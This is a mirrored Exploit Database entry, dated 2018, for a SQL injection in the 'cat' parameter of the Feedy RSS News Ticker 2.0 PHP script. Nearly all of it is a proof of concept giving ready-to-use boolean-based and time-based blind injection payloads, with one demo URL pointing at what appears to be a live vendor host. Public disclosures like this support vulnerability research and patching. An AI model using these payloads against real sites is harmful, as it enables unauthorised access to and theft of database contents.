Feedy RSS News Ticker 2.0 – ‘cat’ SQL Injection

• Exploit Database
• 147 阅读

• 作者： AkkuS
  日期： 2018-05-22
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/44701/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23

  # Exploit Title: Feedy RSS News Ticker 2.0 - 'cat' SQL Injection # Dork: N/A # Date: 2018-05-22 # Exploit Author: Özkan Mustafa Akkuş (AkkuS) # Vendor Homepage: https://codecanyon.net/item/feedy-rss-news-ticker/5818277 # Version: 2.0 # Category: Webapps # Tested on: Kali linux   # PoC: SQLi: # Parameter: cat # Type: boolean-based blind # Demo: http://target/feedy/category.php?cat= # Payload:   cat=akkus+keyney' AND 2367=2367 AND 'NKyC'='NKyC   # Type: AND/OR time-based blind # Demo: http://demo.cudevo.com/feedy/category.php?cat=1 # Payload:   cat=akkus+keyney' AND SLEEP(5) AND 'AEHg'='AEHg